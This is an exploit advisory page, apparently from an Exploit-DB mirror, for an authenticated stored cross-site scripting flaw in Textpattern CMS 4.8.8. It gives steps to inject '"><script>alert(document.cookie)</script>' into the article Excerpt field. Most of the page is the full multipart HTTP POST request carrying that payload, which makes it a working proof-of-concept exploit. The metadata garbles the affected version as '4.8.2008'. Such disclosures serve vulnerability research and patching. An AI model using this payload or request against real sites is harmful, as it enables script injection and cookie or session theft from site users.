Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

vendor:

Textpattern CMS

by:

tmrswrr

7.5

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Textpattern CMS

Affected Version From: 4.8.2008

Affected Version To: 4.8.2008

Patch Exists: NO

Related CWE:

CPE: a:textpattern:textpattern:4.8.8

Metasploit:

Other Scripts:

Platforms Tested:

2023

Textpattern CMS v4.8.8 – Stored Cross-Site Scripting (XSS) (Authenticated)

The Textpattern CMS v4.8.8 is vulnerable to stored cross-site scripting (XSS) attacks. An authenticated user can inject malicious JavaScript code into the Excerpt field of the Articles section in the admin page. When this payload is executed, it will trigger an alert displaying the user's cookie information.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of Textpattern CMS.

Source

Exploit-DB raw data:

# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/


--- Description ---


1) Login admin page , choose Content , Articles section : 
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload  > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button 
https://release-demo.textpattern.co/index.php?id=2


--- Request ---

POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"

2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"

article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"

edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"

"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"

1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"

1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"

4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"

articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"

article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"

2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"

06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"

13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"

19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"

35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"

25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"

alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"

Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"

async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"

fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--